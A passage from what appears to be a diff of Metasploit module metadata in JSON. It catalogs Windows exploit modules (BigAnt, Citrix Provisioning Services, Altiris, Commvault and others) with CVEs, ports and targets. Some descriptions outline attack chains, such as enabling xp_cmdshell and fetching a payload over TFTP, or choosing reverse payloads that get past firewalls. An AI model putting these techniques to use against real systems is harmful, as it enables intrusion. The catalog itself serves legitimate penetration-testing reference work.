Allowing an attacker to takeover even more systems\n and make it rain shells!\n\n Setting the CREATEACCOUNT to true will create a new account, this is\n enabled by default.\n If credeantials are known enter these and run the exploit.", - "references": [ - "CVE-2019-10267", - "URL-https://www.wbsec.nl/ahsay/", - "URL-http://ahsay-dn.ahsay.com/v8/81150/cbs-win.exe" - ], - "platform": "Windows", - "arch": "", - "rport": 443, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Windows x86", - "Linux x86" - ], - "mod_time": "2020-12-23 11:36:38 +0000", - "path": "/modules/exploits/windows/misc/ahsay_backup_fileupload.rb", - "is_install_path": true, - "ref_name": "windows/misc/ahsay_backup_fileupload", - "check": true, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": true - }, - "exploit_windows/misc/ais_esel_server_rce": { - "name": "AIS logistics ESEL-Server Unauth SQL Injection RCE", - "fullname": "exploit/windows/misc/ais_esel_server_rce", - "aliases": [], - "rank": 600, - "disclosure_date": "2019-03-27", - "type": "exploit", - "author": [ - "Manuel Feifel" - ], - "description": "This module will execute an arbitrary payload on an \"ESEL\" server used by the\n AIS logistic software. The server typically listens on port 5099 without TLS.\n There could also be server listening on 5100 with TLS but the port 5099 is\n usually always open.\n The login process is vulnerable to an SQL Injection. Usually a MSSQL Server\n with the 'sa' user is in place.\n\n This module was verified on version 67 but it should also run on lower versions.\n An fixed version was created by AIS in September 2017. However most systems\n have not been updated.\n\n In regard to the payload, unless there is a closed port in the web server,\n you dont want to use any \"bind\" payload. 
You want a \"reverse\" payload,\n probably to your port 80 or to any other outbound port allowed on the firewall.\n\n Currently, one delivery method is supported\n\n This method takes advantage of the Command Stager subsystem. This allows using\n various techniques, such as using a TFTP server, to send the executable. By default\n the Command Stager uses 'wcsript.exe' to generate the executable on the target.\n\n NOTE: This module will leave a payload executable on the target system when the\n attack is finished.", - "references": [ - "CVE-2019-10123" - ], - "platform": "Windows", - "arch": "x86, x64", - "rport": 5099, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic" - ], - "mod_time": "2020-06-10 11:44:55 +0000", - "path": "/modules/exploits/windows/misc/ais_esel_server_rce.rb", - "is_install_path": true, - "ref_name": "windows/misc/ais_esel_server_rce", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/allmediaserver_bof": { - "name": "ALLMediaServer 0.8 Buffer Overflow", - "fullname": "exploit/windows/misc/allmediaserver_bof", - "aliases": [], - "rank": 300, - "disclosure_date": "2012-07-04", - "type": "exploit", - "author": [ - "motaz reda ", - "modpr0be ", - "juan vazquez " - ], - "description": "This module exploits a stack buffer overflow in ALLMediaServer 0.8. The vulnerability\n is caused due to a boundary error within the handling of HTTP request.\n\n While the exploit supports DEP bypass via ROP, on Windows 7 the stack pivoting isn't\n reliable across virtual (VMWare, VirtualBox) and physical environments. 
Because of\n this the module isn't using DEP bypass on the Windows 7 SP1 target, where by default\n DEP is OptIn and AllMediaServer won't run with DEP.", - "references": [ - "CVE-2017-17932", - "OSVDB-83889", - "EDB-19625" - ], - "platform": "Windows", - "arch": "", - "rport": 888, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "ALLMediaServer 0.8 / Windows XP SP3 - English", - "ALLMediaServer 0.8 / Windows 7 SP1 - English" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/allmediaserver_bof.rb", - "is_install_path": true, - "ref_name": "windows/misc/allmediaserver_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/altiris_ds_sqli": { - "name": "Symantec Altiris DS SQL Injection", - "fullname": "exploit/windows/misc/altiris_ds_sqli", - "aliases": [], - "rank": 300, - "disclosure_date": "2008-05-15", - "type": "exploit", - "author": [ - "Brett Moore", - "3v0lver" - ], - "description": "This module exploits a SQL injection flaw in Symantec Altiris Deployment Solution 6.8\n to 6.9.164. The vulnerability exists on axengine.exe which fails to adequately sanitize\n numeric input fields in \"UpdateComputer\" notification Requests. In order to spawn a shell,\n several SQL injections are required in close succession, first to enable xp_cmdshell, then\n retrieve the payload via TFTP and finally execute it. The module also has the capability\n to disable or enable local application authentication. 
In order to work the target system\n must have a tftp client available.", - "references": [ - "CVE-2008-2286", - "OSVDB-45313", - "BID-29198", - "URL-http://www.zerodayinitiative.com/advisories/ZDI-08-024" - ], - "platform": "Windows", - "arch": "", - "rport": 402, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows 2003 (with tftp client available)" - ], - "mod_time": "2022-06-29 19:10:52 +0000", - "path": "/modules/exploits/windows/misc/altiris_ds_sqli.rb", - "is_install_path": true, - "ref_name": "windows/misc/altiris_ds_sqli", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": true - }, - "exploit_windows/misc/apple_quicktime_rtsp_response": { - "name": "Apple QuickTime 7.3 RTSP Response Header Buffer Overflow", - "fullname": "exploit/windows/misc/apple_quicktime_rtsp_response", - "aliases": [], - "rank": 300, - "disclosure_date": "2007-11-23", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in Apple QuickTime 7.3. 
By sending an overly long\n RTSP response to a client, an attacker may be able to execute arbitrary code.", - "references": [ - "CVE-2007-6166", - "OSVDB-40876", - "BID-26549", - "EDB-4648" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "QuickTime 7.3, QuickTime Player 7.3" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/apple_quicktime_rtsp_response.rb", - "is_install_path": true, - "ref_name": "windows/misc/apple_quicktime_rtsp_response", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/asus_dpcproxy_overflow": { - "name": "Asus Dpcproxy Buffer Overflow", - "fullname": "exploit/windows/misc/asus_dpcproxy_overflow", - "aliases": [], - "rank": 200, - "disclosure_date": "2008-03-21", - "type": "exploit", - "author": [ - "Jacopo Cervini" - ], - "description": "This module exploits a stack buffer overflow in Asus Dpcroxy version 2.0.0.19.\n It should be vulnerable until version 2.0.0.24.\n Credit to Luigi Auriemma", - "references": [ - "CVE-2008-1491", - "OSVDB-43638", - "BID-28394" - ], - "platform": "Windows", - "arch": "", - "rport": 623, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Asus Dpcroxy version 2.00.19 Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/asus_dpcproxy_overflow.rb", - "is_install_path": true, - "ref_name": "windows/misc/asus_dpcproxy_overflow", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/avaya_winpmd_unihostrouter": { - "name": "Avaya WinPMD UniteHostRouter Buffer Overflow", - "fullname": "exploit/windows/misc/avaya_winpmd_unihostrouter", - "aliases": [], - "rank": 300, - "disclosure_date": "2011-05-23", - 
"type": "exploit", - "author": [ - "AbdulAziz Hariri", - "Unknown", - "juan vazquez " - ], - "description": "This module exploits a stack buffer overflow in Avaya WinPMD. The vulnerability\n exists in the UniteHostRouter service, due to the insecure usage of memcpy when\n parsing specially crafted \"To:\" headers. The module has been tested successfully on\n Avaya WinPMD 3.8.2 over Windows XP SP3 and Windows 2003 SP2.", - "references": [ - "OSVDB-82764", - "OSVDB-73269", - "BID-47947", - "EDB-18397", - "URL-https://downloads.avaya.com/css/P8/documents/100140122", - "URL-http://web.archive.org/web/20110527165515/http://secunia.com:80/advisories/44062" - ], - "platform": "Windows", - "arch": "", - "rport": 3217, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Avaya WinPMD 3.8.2 / Windows XP SP3", - "Avaya WinPMD 3.8.2 / Windows 2003 SP2" - ], - "mod_time": "2023-03-23 10:19:30 +0000", - "path": "/modules/exploits/windows/misc/avaya_winpmd_unihostrouter.rb", - "is_install_path": true, - "ref_name": "windows/misc/avaya_winpmd_unihostrouter", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/avidphoneticindexer": { - "name": "Avid Media Composer 5.5 - Avid Phonetic Indexer Buffer Overflow", - "fullname": "exploit/windows/misc/avidphoneticindexer", - "aliases": [], - "rank": 300, - "disclosure_date": "2011-11-29", - "type": "exploit", - "author": [ - "vt [nick.freeman " - ], - "description": "This module exploits a stack buffer overflow in process\n AvidPhoneticIndexer.exe (port 4659), which comes as part of the Avid Media Composer\n 5.5 Editing Suite. 
This daemon sometimes starts on a different port; if you start\n it standalone it will run on port 4660.", - "references": [ - "CVE-2011-5003", - "OSVDB-77376", - "URL-http://www.security-assessment.com/files/documents/advisory/Avid_Media_Composer-Phonetic_Indexer-Remote_Stack_Buffer_Overflow.pdf" - ], - "platform": "Windows", - "arch": "", - "rport": 4659, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP Professional SP3" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/avidphoneticindexer.rb", - "is_install_path": true, - "ref_name": "windows/misc/avidphoneticindexer", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/bakbone_netvault_heap": { - "name": "BakBone NetVault Remote Heap Overflow", - "fullname": "exploit/windows/misc/bakbone_netvault_heap", - "aliases": [], - "rank": 200, - "disclosure_date": "2005-04-01", - "type": "exploit", - "author": [ - "hdm ", - "nolimit.bugtraq " - ], - "description": "This module exploits a heap overflow in the BakBone NetVault\n Process Manager service. 
This code is a direct port of the netvault.c\n code written by nolimit and BuzzDee.", - "references": [ - "CVE-2005-1009", - "OSVDB-15234", - "BID-12967" - ], - "platform": "Windows", - "arch": "", - "rport": 20031, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "Windows 2000 SP4 English", - "Windows XP SP0/SP1 English" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/bakbone_netvault_heap.rb", - "is_install_path": true, - "ref_name": "windows/misc/bakbone_netvault_heap", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/bcaaa_bof": { - "name": "Blue Coat Authentication and Authorization Agent (BCAAA) 5 Buffer Overflow", - "fullname": "exploit/windows/misc/bcaaa_bof", - "aliases": [], - "rank": 400, - "disclosure_date": "2011-04-04", - "type": "exploit", - "author": [ - "Paul Harrington", - "Travis Warren", - "sinn3r " - ], - "description": "This module exploits a stack buffer overflow in process bcaaa-130.exe (port 16102),\n which comes as part of the Blue Coat Authentication proxy. Please note that by default,\n this exploit will attempt up to three times in order to successfully gain remote code\n execution (in some cases, it takes as many as five times). This can cause your activity\n to look even more suspicious. 
To modify the number of exploit attempts, set the\n ATTEMPTS option.", - "references": [ - "CVE-2011-5124", - "OSVDB-72095", - "URL-https://kb.bluecoat.com/index?page=content&id=SA55", - "URL-https://seclists.org/bugtraq/2011/Jul/44" - ], - "platform": "Windows", - "arch": "", - "rport": 16102, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "BCAAA Version 5.4.6.1.54128" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/bcaaa_bof.rb", - "is_install_path": true, - "ref_name": "windows/misc/bcaaa_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/bigant_server": { - "name": "BigAnt Server 2.2 Buffer Overflow", - "fullname": "exploit/windows/misc/bigant_server", - "aliases": [], - "rank": 200, - "disclosure_date": "2008-04-15", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in BigAnt Server 2.2.\n By sending a specially crafted packet, an attacker may be\n able to execute arbitrary code.", - "references": [ - "CVE-2008-1914", - "OSVDB-44454", - "BID-28795" - ], - "platform": "Windows", - "arch": "", - "rport": 6080, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows 2000 Pro All English", - "Windows XP Pro SP0/SP1 English" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/bigant_server.rb", - "is_install_path": true, - "ref_name": "windows/misc/bigant_server", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/bigant_server_250": { - "name": "BigAnt Server 2.50 SP1 Buffer Overflow", - "fullname": "exploit/windows/misc/bigant_server_250", - "aliases": [], - "rank": 500, - "disclosure_date": "2008-04-15", - "type": "exploit", - "author": [ - 
"Dr_IDE " - ], - "description": "This exploits a stack buffer overflow in the BigAnt Messaging Service,\n part of the BigAnt Server product suite. This module was tested\n successfully against version 2.50 SP1.", - "references": [ - "CVE-2008-1914", - "OSVDB-44454", - "EDB-9673", - "EDB-9690" - ], - "platform": "Windows", - "arch": "", - "rport": 6660, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "BigAnt 2.5 Universal", - "Windows 2000 Pro All English", - "Windows XP Pro SP0/SP1 English" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/bigant_server_250.rb", - "is_install_path": true, - "ref_name": "windows/misc/bigant_server_250", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/bigant_server_dupf_upload": { - "name": "BigAnt Server DUPF Command Arbitrary File Upload", - "fullname": "exploit/windows/misc/bigant_server_dupf_upload", - "aliases": [], - "rank": 600, - "disclosure_date": "2013-01-09", - "type": "exploit", - "author": [ - "Hamburgers Maccoy", - "juan vazquez " - ], - "description": "This exploits an arbitrary file upload vulnerability in BigAnt Server 2.97 SP7.\n A lack of authentication allows to make unauthenticated file uploads through a DUPF\n command. Additionally the filename option in the same command can be used to launch\n a directory traversal attack and achieve arbitrary file upload.\n\n The module uses the Windows Management Instrumentation service to execute an\n arbitrary payload on vulnerable installations of BigAnt on Windows XP and 2003. 
It\n has been successfully tested on BigAnt Server 2.97 SP7 over Windows XP SP3 and 2003\n SP2.", - "references": [ - "CVE-2012-6274", - "US-CERT-VU-990652", - "BID-57214", - "OSVDB-89342" - ], - "platform": "Windows", - "arch": "", - "rport": 6661, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "BigAnt Server 2.97 SP7" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/bigant_server_dupf_upload.rb", - "is_install_path": true, - "ref_name": "windows/misc/bigant_server_dupf_upload", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": true - }, - "exploit_windows/misc/bigant_server_sch_dupf_bof": { - "name": "BigAnt Server 2 SCH And DUPF Buffer Overflow", - "fullname": "exploit/windows/misc/bigant_server_sch_dupf_bof", - "aliases": [], - "rank": 300, - "disclosure_date": "2013-01-09", - "type": "exploit", - "author": [ - "Hamburgers Maccoy", - "juan vazquez " - ], - "description": "This exploits a stack buffer overflow in BigAnt Server 2.97 SP7. The\n vulnerability is due to the dangerous usage of strcpy while handling errors. 
This\n module uses a combination of SCH and DUPF request to trigger the vulnerability, and\n has been tested successfully against version 2.97 SP7 over Windows XP SP3 and\n Windows 2003 SP2.", - "references": [ - "CVE-2012-6275", - "US-CERT-VU-990652", - "BID-57214", - "OSVDB-89344" - ], - "platform": "Windows", - "arch": "", - "rport": 6661, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "BigAnt Server 2.97 SP7 / Windows XP SP3", - "BigAnt Server 2.97 SP7 / Windows 2003 SP2" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/bigant_server_sch_dupf_bof.rb", - "is_install_path": true, - "ref_name": "windows/misc/bigant_server_sch_dupf_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/bigant_server_usv": { - "name": "BigAnt Server 2.52 USV Buffer Overflow", - "fullname": "exploit/windows/misc/bigant_server_usv", - "aliases": [], - "rank": 500, - "disclosure_date": "2009-12-29", - "type": "exploit", - "author": [ - "Lincoln", - "DouBle_Zer0", - "jduck " - ], - "description": "This exploits a stack buffer overflow in the BigAnt Messaging Service,\n part of the BigAnt Server product suite. 
This module was tested\n successfully against version 2.52.\n\n NOTE: The AntServer service does not restart, you only get one shot.", - "references": [ - "CVE-2009-4660", - "OSVDB-61386", - "EDB-10765", - "EDB-10973" - ], - "platform": "Windows", - "arch": "", - "rport": 6660, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "BigAnt 2.52 Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/bigant_server_usv.rb", - "is_install_path": true, - "ref_name": "windows/misc/bigant_server_usv", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/bomberclone_overflow": { - "name": "Bomberclone 0.11.6 Buffer Overflow", - "fullname": "exploit/windows/misc/bomberclone_overflow", - "aliases": [], - "rank": 200, - "disclosure_date": "2006-02-16", - "type": "exploit", - "author": [ - "Jacopo Cervini " - ], - "description": "This module exploits a stack buffer overflow in Bomberclone 0.11.6 for Windows.\n The return address is overwritten with lstrcpyA memory address,\n the second and third value are the destination buffer,\n the fourth value is the source address of our buffer in the stack.\n This exploit is like a return in libc.\n\n ATTENTION\n The shellcode is exec ONLY when someone try to close bomberclone.", - "references": [ - "CVE-2006-0460", - "OSVDB-23263", - "BID-16697" - ], - "platform": "Windows", - "arch": "", - "rport": 11000, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "Windows XP SP2 Italian", - "Windows 2000 SP1 English", - "Windows 2000 SP1 English" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/bomberclone_overflow.rb", - "is_install_path": true, - "ref_name": "windows/misc/bomberclone_overflow", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - 
"session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/bopup_comm": { - "name": "Bopup Communications Server Buffer Overflow", - "fullname": "exploit/windows/misc/bopup_comm", - "aliases": [], - "rank": 400, - "disclosure_date": "2009-06-18", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in Bopup Communications Server 3.2.26.5460.\n By sending a specially crafted packet, an attacker may be\n able to execute arbitrary code.", - "references": [ - "CVE-2009-2227", - "OSVDB-55275", - "URL-http://www.blabsoft.com/products/server", - "EDB-9002" - ], - "platform": "Windows", - "arch": "", - "rport": 19810, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Bopup Communications Server 3.2.26.5460" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/bopup_comm.rb", - "is_install_path": true, - "ref_name": "windows/misc/bopup_comm", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/borland_interbase": { - "name": "Borland Interbase Create-Request Buffer Overflow", - "fullname": "exploit/windows/misc/borland_interbase", - "aliases": [], - "rank": 200, - "disclosure_date": "2007-07-24", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in Borland Interbase 2007.\n By sending a specially crafted create-request packet, a remote\n attacker may be able to execute arbitrary code.", - "references": [ - "CVE-2007-3566", - "OSVDB-38602", - "URL-http://dvlabs.tippingpoint.com/advisory/TPTI-07-13" - ], - "platform": "Windows", - "arch": "", - "rport": 3050, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows 2000 English All / Borland InterBase 2007" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": 
"/modules/exploits/windows/misc/borland_interbase.rb", - "is_install_path": true, - "ref_name": "windows/misc/borland_interbase", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/borland_starteam": { - "name": "Borland CaliberRM StarTeam Multicast Service Buffer Overflow", - "fullname": "exploit/windows/misc/borland_starteam", - "aliases": [], - "rank": 200, - "disclosure_date": "2008-04-02", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in Borland CaliberRM 2006. By sending\n a specially crafted GET request to the STMulticastService, an attacker may be\n able to execute arbitrary code.", - "references": [ - "CVE-2008-0311", - "OSVDB-44039", - "BID-28602" - ], - "platform": "Windows", - "arch": "", - "rport": 3057, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Windows 2000 SP4 English", - "Windows 2003 SP0 English" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/borland_starteam.rb", - "is_install_path": true, - "ref_name": "windows/misc/borland_starteam", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/citrix_streamprocess": { - "name": "Citrix Provisioning Services 5.6 streamprocess.exe Buffer Overflow", - "fullname": "exploit/windows/misc/citrix_streamprocess", - "aliases": [], - "rank": 400, - "disclosure_date": "2011-01-20", - "type": "exploit", - "author": [ - "mog" - ], - "description": "This module exploits a stack buffer overflow in Citrix Provisioning Services 5.6.\n By sending a specially crafted packet to the Provisioning Services server, a fixed\n length buffer on the stack can be overflowed and 
arbitrary code can be executed.", - "references": [ - "OSVDB-70597", - "ZDI-11-023", - "URL-http://web.archive.org/web/20110123164820/http://secunia.com:80/advisories/42954/", - "URL-http://support.citrix.com/article/CTX127149" - ], - "platform": "Windows", - "arch": "", - "rport": 6905, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP SP3 / Windows Server 2003 SP2 / Windows Vista" - ], - "mod_time": "2023-03-23 10:19:30 +0000", - "path": "/modules/exploits/windows/misc/citrix_streamprocess.rb", - "is_install_path": true, - "ref_name": "windows/misc/citrix_streamprocess", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/citrix_streamprocess_data_msg": { - "name": "Citrix Provisioning Services 5.6 SP1 Streamprocess Opcode 0x40020000 Buffer Overflow", - "fullname": "exploit/windows/misc/citrix_streamprocess_data_msg", - "aliases": [], - "rank": 300, - "disclosure_date": "2011-11-04", - "type": "exploit", - "author": [ - "AbdulAziz Hariri", - "alino <26alino@gmail.com>" - ], - "description": "This module exploits a remote buffer overflow in the Citrix Provisioning Services\n 5.6 SP1 (without Hotfix CPVS56SP1E043) by sending a malformed packet to the\n 6905/UDP port. 
The module has been successfully tested on Windows Server 2003 SP2,\n Windows 7, and Windows XP SP3.", - "references": [ - "OSVDB-75780", - "BID-49803", - "ZDI-12-009", - "URL-http://support.citrix.com/article/CTX130846" - ], - "platform": "Windows", - "arch": "", - "rport": 6905, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Citrix Provisioning Services 5.6 SP1" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/citrix_streamprocess_data_msg.rb", - "is_install_path": true, - "ref_name": "windows/misc/citrix_streamprocess_data_msg", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/citrix_streamprocess_get_boot_record_request": { - "name": "Citrix Provisioning Services 5.6 SP1 Streamprocess Opcode 0x40020004 Buffer Overflow", - "fullname": "exploit/windows/misc/citrix_streamprocess_get_boot_record_request", - "aliases": [], - "rank": 300, - "disclosure_date": "2011-11-04", - "type": "exploit", - "author": [ - "alino <26alino@gmail.com>", - "juan vazquez " - ], - "description": "This module exploits a remote buffer overflow in the Citrix Provisioning Services\n 5.6 SP1 (without Hotfix CPVS56SP1E043) by sending a malformed packet with the opcode\n 0x40020004 (GetBootRecordRequest) to the 6905/UDP port. 
The module, which allows\n code execution under the context of SYSTEM, has been successfully tested on Windows Server\n 2003 SP2 and Windows XP SP3.", - "references": [ - "OSVDB-75780", - "BID-49803", - "URL-http://support.citrix.com/article/CTX130846" - ], - "platform": "Windows", - "arch": "", - "rport": 6905, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Citrix Provisioning Services 5.6 SP1" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/citrix_streamprocess_get_boot_record_request.rb", - "is_install_path": true, - "ref_name": "windows/misc/citrix_streamprocess_get_boot_record_request", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/citrix_streamprocess_get_footer": { - "name": "Citrix Provisioning Services 5.6 SP1 Streamprocess Opcode 0x40020002 Buffer Overflow", - "fullname": "exploit/windows/misc/citrix_streamprocess_get_footer", - "aliases": [], - "rank": 300, - "disclosure_date": "2011-11-04", - "type": "exploit", - "author": [ - "alino <26alino@gmail.com>", - "juan vazquez " - ], - "description": "This module exploits a remote buffer overflow in the Citrix Provisioning Services\n 5.6 SP1 (without Hotfix CPVS56SP1E043) by sending a malformed packet with the opcode\n 0x40020002 (GetFooterRequest) to the 6905/UDP port. 
The module, which allows code execution\n under the context of SYSTEM, has been successfully tested on Windows Server 2003 SP2\n and Windows XP SP3.", - "references": [ - "OSVDB-75780", - "BID-49803", - "URL-http://support.citrix.com/article/CTX130846" - ], - "platform": "Windows", - "arch": "", - "rport": 6905, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Citrix Provisioning Services 5.6 SP1" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/citrix_streamprocess_get_footer.rb", - "is_install_path": true, - "ref_name": "windows/misc/citrix_streamprocess_get_footer", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/citrix_streamprocess_get_objects": { - "name": "Citrix Provisioning Services 5.6 SP1 Streamprocess Opcode 0x40020006 Buffer Overflow", - "fullname": "exploit/windows/misc/citrix_streamprocess_get_objects", - "aliases": [], - "rank": 300, - "disclosure_date": "2011-11-04", - "type": "exploit", - "author": [ - "Anyway ", - "alino <26alino@gmail.com>", - "juan vazquez " - ], - "description": "This module exploits a remote buffer overflow in the Citrix Provisioning Services\n 5.6 SP1 (without Hotfix CPVS56SP1E043) by sending a malformed packet with the opcode\n 0x40020006 (GetObjetsRequest) to the 6905/UDP port. 
The module, which allows code execution\n under the context of SYSTEM, has been successfully tested on Windows Server 2003 SP2\n and Windows XP SP3.", - "references": [ - "OSVDB-75780", - "BID-49803", - "URL-http://support.citrix.com/article/CTX130846", - "ZDI-12-010" - ], - "platform": "Windows", - "arch": "", - "rport": 6905, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Citrix Provisioning Services 5.6 SP1" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/citrix_streamprocess_get_objects.rb", - "is_install_path": true, - "ref_name": "windows/misc/citrix_streamprocess_get_objects", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/cloudme_sync": { - "name": "CloudMe Sync v1.10.9", - "fullname": "exploit/windows/misc/cloudme_sync", - "aliases": [], - "rank": 500, - "disclosure_date": "2018-01-17", - "type": "exploit", - "author": [ - "hyp3rlinx", - "Daniel Teixeira" - ], - "description": "This module exploits a stack-based buffer overflow vulnerability\n in CloudMe Sync v1.10.9 client application. 
This module has been\n tested successfully on Windows 7 SP1 x86.", - "references": [ - "CVE-2018-6892", - "EDB-44027" - ], - "platform": "Windows", - "arch": "", - "rport": 8888, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "CloudMe Sync v1.10.9" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/cloudme_sync.rb", - "is_install_path": true, - "ref_name": "windows/misc/cloudme_sync", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/commvault_cmd_exec": { - "name": "Commvault Communications Service (cvd) Command Injection", - "fullname": "exploit/windows/misc/commvault_cmd_exec", - "aliases": [], - "rank": 400, - "disclosure_date": "2017-12-12", - "type": "exploit", - "author": [ - "b0yd" - ], - "description": "This module exploits a command injection vulnerability\n discovered in Commvault Service v11 SP5 and earlier versions (tested in v11 SP5\n and v10). The vulnerability exists in the cvd.exe service and allows an\n attacker to execute arbitrary commands in the context of the service. By\n default, the Commvault Communications service installs and runs as SYSTEM in\n Windows and does not require authentication. This vulnerability was discovered\n in the Windows version. 
